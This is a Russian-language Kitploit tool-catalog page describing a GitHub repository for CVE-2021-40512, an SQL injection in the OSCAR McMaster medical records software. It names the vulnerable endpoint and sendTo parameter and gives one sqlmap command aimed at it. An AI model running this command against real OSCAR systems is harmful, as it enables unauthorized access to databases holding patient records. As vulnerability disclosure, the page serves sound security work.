Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-40512 — CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability. | Kitploit
Инструменты/GitHubGitHub/war4uthor/cve-2021-40512
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubwar4uthor/cve-2021-40512

CVE-2021-40512

CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability.

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-40512 Уязвимость SQL-инъекции в OSCAR McMaster 19.40~1235

Уязвимость SQL-инъекции существует в версии 19.40~1235 OSCAR McMaster. Злоумышленник может отправлять SQL-команды в базу данных MySQL/MariaDB через уязвимый параметр sendTo, расположенный на конечной точке /oscar/oscarEncounter/ViewConsultation.do.

[Заполнитель для cve.mitre]

[Заполнитель для nist]

Уязвимая JSP-страница:

ViewConsultation.do - параметр sendTo

Уязвимая нагрузка:

sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner

Обнаружено Джеком Макбрайдом, август 2021

Скачать инструмент